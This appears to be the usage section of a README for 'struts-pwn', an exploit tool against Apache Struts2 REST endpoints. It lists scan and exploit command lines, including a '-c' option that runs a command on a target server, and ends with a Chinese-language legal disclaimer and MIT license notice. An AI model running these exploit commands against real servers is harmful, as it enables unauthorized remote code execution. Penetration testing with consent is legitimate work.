python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

本项目仅用于教育和道德测试目的。未经事先双方同意,使用 struts-pwn 攻击目标属于非法行为。遵守所有适用的地方、州和联邦法律是最终用户的责任。开发人员不承担任何责任,也不对因使用本程序造成的任何滥用或损害负责。
本项目采用 MIT 许可证授权。
Mazin Ahmed